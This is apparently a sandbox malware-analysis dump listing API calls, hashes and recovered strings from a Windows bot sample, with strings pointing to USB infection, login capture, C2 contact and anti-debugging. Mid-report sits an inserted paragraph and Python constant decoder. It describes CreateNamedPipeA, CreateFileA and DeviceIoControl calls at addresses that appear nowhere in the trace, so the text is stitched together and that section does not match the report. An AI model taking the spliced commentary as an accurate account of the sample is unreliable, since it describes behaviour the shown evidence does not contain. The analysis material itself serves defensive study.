                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: 536da33ee251caa1826b6da7d3ea45735cfc11ddaf55f6fde9000fac5c912f52
                                                                  • Instruction ID: bcf87c851dca9b873a90497d5bb07176677da3f1d14b393eeb859a4476ba7e0a
                                                                  • Opcode Fuzzy Hash: 536da33ee251caa1826b6da7d3ea45735cfc11ddaf55f6fde9000fac5c912f52
                                                                  • Instruction Fuzzy Hash: 70110C7694031977E720E6699C86FF7736CDB84740F0406B8B918672C2E5B09E4087E0
                                                                  APIs
                                                                  • _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                  • strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 003E0322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03EE
                                                                  • LeaveCriticalSection.KERNEL32(0041B4E4), ref: 003E03FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: 9782b6aea3b394cab68a1d687117295e2e44150c3da30f32962116118352e35b
                                                                  • Instruction ID: 055f7cd5b5166471076e06e7c7c0e2d4b4ace3ae238faa3cd6f5cf41c6ba3458
                                                                  • Opcode Fuzzy Hash: 9782b6aea3b394cab68a1d687117295e2e44150c3da30f32962116118352e35b
                                                                  • Instruction Fuzzy Hash: 6D11EC75A40269ABDB268792CC81BBE7378EB94300F144769FA15671C0D7B4BD818F91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: fa3f915c36e92becb304a62d8f08836efe5da1dd8732c3a6bba5796dbd4117b6
                                                                  • Instruction ID: 5e50ba2961e2f3403e61d8d2176927a908d51661619bd1c5c7e6cf318101a3ae
                                                                  • Opcode Fuzzy Hash: fa3f915c36e92becb304a62d8f08836efe5da1dd8732c3a6bba5796dbd4117b6
                                                                  • Instruction Fuzzy Hash: 63F0B4735416949ACE333BF87D8A56E321A5F12374F210713F615CA7F1EB3499808AA2
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s_%d,EDB88F28,?,00010000,EDB88320,00000000), ref: 003D45D5
                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,003D4BA5,?,?,?,00010000,EDB88320,00000000), ref: 003D45FD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 003D4636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280
                                                                  • Opcode ID: 6bff0d8f59c82696245ff2424a048725beccbf7a1a8537736c6ea151bcfb1668
                                                                  • Instruction ID: 3589735130facbc3d8842c1e94acd1d69d8fc8487589de2d3374ef0f1c9b270d
                                                                  • Opcode Fuzzy Hash: 6bff0d8f59c82696245ff2424a048725beccbf7a1a8537736c6ea151bcfb1668
                                                                  • Instruction Fuzzy Hash: 4561E3726006428BD726CF18D8C5BB5B7E5FF84304F18827DE6868B3C5D779A9A0DB80
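The argument values the sandbox recorded for CreateNamedPipeA (ref 003D3C0F), CreateFileA and DeviceIoControl (refs 003DF2FA, 003DF352) and MapViewOfFile (ref 003D4636) above are raw constants. The Python decoder below, added here as an example and not part of the report or of the sample, names them from the documented Win32 / WDK definitions: 0x2D1400 is CTL_CODE(FILE_DEVICE_MASS_STORAGE, 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS), i.e. IOCTL_STORAGE_QUERY_PROPERTY, and the 0x0C input-buffer size equals sizeof(STORAGE_PROPERTY_QUERY). Because that IOCTL requires only FILE_ANY_ACCESS, the volume handle opened on \\.\%c: with dwDesiredAccess 0 is sufficient and needs no elevation; which storage property the sample asks for is not recoverable from this trace (the query structure lives at 003E09A7). 0x40000001 is PIPE_ACCESS_INBOUND | FILE_FLAG_OVERLAPPED with PIPE_UNLIMITED_INSTANCES (0xFF), and 0x000F001F is FILE_MAP_ALL_ACCESS.

```python
"""Decode the numeric arguments recorded in the API trace above.  Added example
for this report (not code from the sample); every constant is the documented
Win32 / WDK value, and the argument values are copied from the trace lines."""

# CTL_CODE layout (winioctl.h): DeviceType<<16 | Access<<14 | Function<<2 | Method
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
# IOCTL_STORAGE_QUERY_PROPERTY = CTL_CODE(IOCTL_STORAGE_BASE, 0x0500, METHOD_BUFFERED, FILE_ANY_ACCESS)
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}


def decode_ioctl(code: int) -> dict:
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    return {
        "device": DEVICE_TYPES.get(device, hex(device)),
        "access": ACCESS[(code >> 14) & 3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def decode_flags(value: int, table: dict) -> list:
    """Name every bit group from `table` ({mask: name}) present in value; leftovers stay hex."""
    names, rest = [], value
    for mask, name in sorted(table.items()):
        if value & mask == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return names


GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_create_file(desired_access: int, share_mode: int, disposition: int) -> dict:
    """CreateFileA dwDesiredAccess / dwShareMode / dwCreationDisposition."""
    return {
        # dwDesiredAccess == 0 yields a handle that can only query attributes and issue
        # FILE_ANY_ACCESS IOCTLs; that is all IOCTL_STORAGE_QUERY_PROPERTY needs
        "access": decode_flags(desired_access, GENERIC) if desired_access else ["0 (query only)"],
        "share": decode_flags(share_mode, SHARE),
        "disposition": DISPOSITION.get(disposition, hex(disposition)),
    }


PIPE_ACCESS = {1: "PIPE_ACCESS_INBOUND", 2: "PIPE_ACCESS_OUTBOUND", 3: "PIPE_ACCESS_DUPLEX"}
PIPE_FLAGS = {0x00080000: "FILE_FLAG_FIRST_PIPE_INSTANCE",
              0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
PIPE_UNLIMITED_INSTANCES = 0xFF


def decode_pipe_open_mode(mode: int) -> list:
    """CreateNamedPipe dwOpenMode: low two bits are the direction, high bits are flags."""
    return [PIPE_ACCESS.get(mode & 3, "?")] + decode_flags(mode & ~3 & 0xFFFFFFFF, PIPE_FLAGS)


# MapViewOfFile dwDesiredAccess: FILE_MAP_ALL_ACCESS is SECTION_ALL_ACCESS == 0x000F001F
MAP_ACCESS = {0x1: "SECTION_QUERY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ",
              0x8: "SECTION_MAP_EXECUTE", 0x10: "SECTION_EXTEND_SIZE",
              0xF0000: "STANDARD_RIGHTS_REQUIRED"}


def decode_trace() -> dict:
    """Argument values copied from the trace: CreateNamedPipeA @003D3C0F,
    CreateFileA @003DF2FA, DeviceIoControl @003DF352, MapViewOfFile @003D4636."""
    return {
        "CreateNamedPipeA": {"open_mode": decode_pipe_open_mode(0x40000001),
                             "unlimited_instances": 0xFF == PIPE_UNLIMITED_INSTANCES},
        "CreateFileA": decode_create_file(0x00000000, 0x00000003, 0x00000003),
        "DeviceIoControl": decode_ioctl(0x002D1400),
        "MapViewOfFile": decode_flags(0x000F001F, MAP_ACCESS),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(decode_trace(), indent=2))
```

The same tables can be extended with whatever IOCTLs and flag sets a given report contains; decoding them up front is what turns "CreateFileA on \\.\%c: followed by DeviceIoControl" into a concrete statement about what the sample can and cannot learn about each volume.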
                                                                  APIs
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • lstrlenA.KERNEL32(?), ref: 003DE517
                                                                  • _memicmp.MSVCRT(?,?,00000000), ref: 003DE525
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DE54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE57A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
                                                                  • Opcode ID: 37f44b5027501741385ccb806256ed2f3fefb38ec55eb283ea5d5bccbe4e8dcd
                                                                  • Instruction ID: c4da85a2bd23f508bb960595dd93d31b869bea1dab3f4a657cb9148e8baabe72
                                                                  • Opcode Fuzzy Hash: 37f44b5027501741385ccb806256ed2f3fefb38ec55eb283ea5d5bccbe4e8dcd
                                                                  • Instruction Fuzzy Hash: 8521F3B2600204ABD722EB45FC82FAB77ADEB84754F11451AF9044B381F7B5ED50C6A2
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 003D1C6E
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003D1CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D1CD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseFileModuleWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2352564674-2113957990
                                                                  • Opcode ID: a01d63154a453da458be588542e40305e16d35d705be4c740e47213fac1e9841
                                                                  • Instruction ID: e87756ae425e260559b957e36cab693cb03bf4f2649c326e13d4d92f061e6520
                                                                  • Opcode Fuzzy Hash: a01d63154a453da458be588542e40305e16d35d705be4c740e47213fac1e9841
                                                                  • Instruction Fuzzy Hash: 0C0104B26502187FD7159FA9AC86FEF336DAB49324F158319FA15973C0E2705D0543A0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,003D6C55,00000000), ref: 003D6DA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID: NtQueryInformationProcess$NtSetInformationProcess$Ul=$ntdll.dll
                                                                  • API String ID: 4139908857-2226115229
                                                                  • Opcode ID: 37bfbb09b333d5dc2aab79b844675fd979570d4566211817a90d6005e6c2c298
                                                                  • Instruction ID: 2e6476766fd6c5a67c2ddb4e3e68555a0b9425335b992cba5fbfe92cc2288f14
                                                                  • Opcode Fuzzy Hash: 37bfbb09b333d5dc2aab79b844675fd979570d4566211817a90d6005e6c2c298
                                                                  • Instruction Fuzzy Hash: C601887374176837EB225659AC46FEA739CCB86769F010257FE08AB380DAB19D0042E1
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 003DFAC0
                                                                  • sprintf.MSVCRT(?,%c:\,?,?), ref: 003DFAF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ProcWindowsprintf
                                                                  • String ID: %c:\$@W>$[USB]: Infected %s
                                                                  • API String ID: 3179433310-1980713265
                                                                  • Opcode ID: de4cb217f911267c07fbdb6c424aa604e6b5708369432234cf094d5b46a92848
                                                                  • Instruction ID: 154fb0dfbf760bc08cfb8e0ca589042193a609edd30685933fec8f70c9584993
                                                                  • Opcode Fuzzy Hash: de4cb217f911267c07fbdb6c424aa604e6b5708369432234cf094d5b46a92848
                                                                  • Instruction Fuzzy Hash: E011CAB75001485FC721DF74EC91EBB737DEB44308F04866AFE069A342E631D9518B65
                                                                  APIs
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DD5E4
                                                                    • Part of subcall function 003D8F50: ApplyControlToken.SECUR32(?,?), ref: 003D8FB5
                                                                    • Part of subcall function 003D8F50: InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D8FF9
                                                                    • Part of subcall function 003D8F50: DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D9025
                                                                    • Part of subcall function 003D8F50: FreeCredentialsHandle.SECUR32(?), ref: 003D902F
                                                                  • Sleep.KERNEL32(0000000F), ref: 003DD659
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ContextSecuritySleep$ApplyControlCredentialsDeleteFreeHandleInitializeToken
                                                                  • String ID: %s:%d$cnc$V>
                                                                  • API String ID: 3241915987-1760554709
                                                                  • Opcode ID: 1027fa1f3a627bd8ef692701608cd9e2675db4915c29c4c3c612866076e38c04
                                                                  • Instruction ID: 6459a008c5311a5df8482184d536385244e7266b88598dba91a73554dcaec20a
                                                                  • Opcode Fuzzy Hash: 1027fa1f3a627bd8ef692701608cd9e2675db4915c29c4c3c612866076e38c04
                                                                  • Instruction Fuzzy Hash: 9C41B6B6E00104EBC712DBA9FCC19AEB3BDEB84314F554666F909DB345D631ED4087A1
                                                                  APIs
                                                                  • strstr.MSVCRT(?,003E13D8), ref: 003D170E
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 003D1754
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003D1764
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strstr$lstrcmp
                                                                  • String ID: bdns$block
                                                                  • API String ID: 142677638-4143068083
                                                                  • Opcode ID: 098e1908b82a734e3652534f3fe9ff77ce8e7adfd49e450af2b963b352aad5cd
                                                                  • Instruction ID: 76e5064a96464453f375a9fcb4f18ec154fcc4aa391218a038ceb4957787a237
                                                                  • Opcode Fuzzy Hash: 098e1908b82a734e3652534f3fe9ff77ce8e7adfd49e450af2b963b352aad5cd
                                                                  • Instruction Fuzzy Hash: D621C1B6601218BB9B22DE59BC86DBB736CDB98711F04422AFC0197381E770ED1196B1
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103A), ref: 003D7E2C
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D7E63
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D7E7A
                                                                  • connect.WS2_32(?,00000008,00000010), ref: 003D7E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocalconnectioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3721573447-0
                                                                  • Opcode ID: 55df459790f8ee0c5d007b57bdd462bc9d7dd14df00b288c810b0c5cc0c721d1
                                                                  • Instruction ID: 6b6dd9eebb4f2ce327a5cf8e8ead0fecb89f6376a4adf87bf3a33ccc0dd29548
                                                                  • Opcode Fuzzy Hash: 55df459790f8ee0c5d007b57bdd462bc9d7dd14df00b288c810b0c5cc0c721d1
                                                                  • Instruction Fuzzy Hash: 8F112931A00714AFC721DF69D849ED6B7A8DF49720F00079AF9599B3D1D2B19C848790
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 003DE77C
                                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000012,?), ref: 003DE793
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 003DE7B5
                                                                  • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,00000004,00000000,00000000), ref: 003DE7C3
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DE7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ChangeCloseNotifyOpenlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2592630252-0
                                                                  • Opcode ID: 9b6c5b5f3c7063ed94ca6289b6774207238d01a114866b0c3414f4323c08b7af
                                                                  • Instruction ID: dd74658639e5e8f977568a1b7dbbd769c0a2bf1c2c1903ab1769ee2fe59a25a5
                                                                  • Opcode Fuzzy Hash: 9b6c5b5f3c7063ed94ca6289b6774207238d01a114866b0c3414f4323c08b7af
                                                                  • Instruction Fuzzy Hash: E5011A75340344BFE730DB65DC89F977BACEB88B50F108519BA499B2C0D670E8408B60
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                  • _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrcmpA.KERNEL32(00000000,003E1A30), ref: 003D777F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexObjectReleaseSingleWait_snprintflstrcmplstrlenmemset
                                                                  • String ID: state_%s
                                                                  • API String ID: 1716770999-3670522127
                                                                  • Opcode ID: 3dc047f0c122497248d62afd6133ae49dafe62d1829e1c3da6a2ac4d586f06a6
                                                                  • Instruction ID: 31c3f54f4fff1c7080410d8b9a306fa3f77f821215ee00cc0d69d873ed92cb1f
                                                                  • Opcode Fuzzy Hash: 3dc047f0c122497248d62afd6133ae49dafe62d1829e1c3da6a2ac4d586f06a6
                                                                  • Instruction Fuzzy Hash: 030126B69503586ADB21EAA0DD0BFF973AC8B44700F0046E5FA18E61C2F6B06A448A90
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s-comm,00407AE8), ref: 003D510F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003D5122
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003D512B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-comm
                                                                  • API String ID: 3057366584-1028030816
                                                                  • Opcode ID: 9916b393eab39adcd0a7edaace8d62d6ca61503d76f16c2f07b53934d20b2372
                                                                  • Instruction ID: 3dc124d0faa8228b31b42f0f6cf50e92a7b0d95cf7d9dd465a32c03b3641fa0d
                                                                  • Opcode Fuzzy Hash: 9916b393eab39adcd0a7edaace8d62d6ca61503d76f16c2f07b53934d20b2372
                                                                  • Instruction Fuzzy Hash: A7214D76A802047BD715DB90EC42FEB3338A784701F044AA6F404672C1E7B8DF94CBA5
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s-pid,00407AE8), ref: 003D508F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 003D50A2
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003D50AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMutexObjectSingleWait_snprintf
                                                                  • String ID: %s-pid
                                                                  • API String ID: 3057366584-2694366501
                                                                  • Opcode ID: f2246012bf2935fedd4217bb138b6bed28ab41ac66051b45e6731164bcb4ced6
                                                                  • Instruction ID: 348d16ab7a04935afc6df9d3ec8ab4bcdec5a3975b7afb5e632f2eb56e87ae18
                                                                  • Opcode Fuzzy Hash: f2246012bf2935fedd4217bb138b6bed28ab41ac66051b45e6731164bcb4ced6
                                                                  • Instruction Fuzzy Hash: CCF0E9B2A4424467EB21E770AC8BF96325C9710711F500767F614B62C0E9F599C486A6
                                                                  APIs
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  • Sleep.KERNEL32(00001388), ref: 003DD78A
                                                                  • Sleep.KERNEL32(00002710), ref: 003DD795
                                                                  • ExitProcess.KERNEL32 ref: 003DD799
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExitProcess_snprintflstrlenmemset
                                                                  • String ID: bsod
                                                                  • API String ID: 706155222-1315366068
                                                                  • Opcode ID: 04e6a2021b50c2573891f2fee505241d04cec8b68ada6edf30b64157e0f88aed
                                                                  • Instruction ID: 0b298bebafb495438317dbb8095fd133397398f08a3726b65a6db5090b36a4c9
                                                                  • Opcode Fuzzy Hash: 04e6a2021b50c2573891f2fee505241d04cec8b68ada6edf30b64157e0f88aed
                                                                  • Instruction Fuzzy Hash: 07D097738C427073C23323352C0AF8B28389F40F21F020341F905AF2C085E02C8180E2
                                                                  APIs
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D760,00000000,00000000,00000000), ref: 003DE861
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DE868
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateHandleThread_snprintf_vsnprintfmemset
                                                                  • String ID: admin$isadmin
                                                                  • API String ID: 3136305548-1977506819
                                                                  • Opcode ID: 8d427f19ec4bf309b6b6e2848fad67793b8194d4e5b4b6e90ce3f87d3742e7d1
                                                                  • Instruction ID: 8ca3d8bb889443fafefec06c2b5a6d122c5eaba09cd5af9cc051cccd970d46ff
                                                                  • Opcode Fuzzy Hash: 8d427f19ec4bf309b6b6e2848fad67793b8194d4e5b4b6e90ce3f87d3742e7d1
                                                                  • Instruction Fuzzy Hash: 3CD0127ABC438076F67227A0AD4FF4A226C2B24F07F644621FB00BD2C1E9F0304049B9
                                                                  APIs
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • inet_addr.WS2_32(?), ref: 003D28BE
                                                                  • DnsQuery_A.DNSAPI(?,00000001,00000008,00000000,?,00000000), ref: 003D2939
                                                                  • _stricmp.MSVCRT(?,?,?), ref: 003D294E
                                                                  • DnsFree.DNSAPI(?,00000001), ref: 003D29D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeProcessQuery__stricmpinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3002912770-0
                                                                  • Opcode ID: 110f96b6d1d035b685377ec64160652de67e228f322d3c32d59a017b7326408f
                                                                  • Instruction ID: 38759212033da1131396e0bc97618a6a14ba2914d062587d9e048300738c332c
                                                                  • Opcode Fuzzy Hash: 110f96b6d1d035b685377ec64160652de67e228f322d3c32d59a017b7326408f
                                                                  • Instruction Fuzzy Hash: 035103726002009FD722DF59E881B6BB3B5FFA6704F21446AE9859F384E771ED50CB90
                                                                  APIs
                                                                  • ApplyControlToken.SECUR32(?,?), ref: 003D8FB5
                                                                  • InitializeSecurityContextA.SECUR32(?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D8FF9
                                                                  • DeleteSecurityContext.SECUR32(?,?,?,00000000,0008C11C,00000000,00000010,00000000,00000000,?,?,?,?), ref: 003D9025
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 003D902F
                                                                    • Part of subcall function 003D8760: FreeContextBuffer.SECUR32(?), ref: 003D8774
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
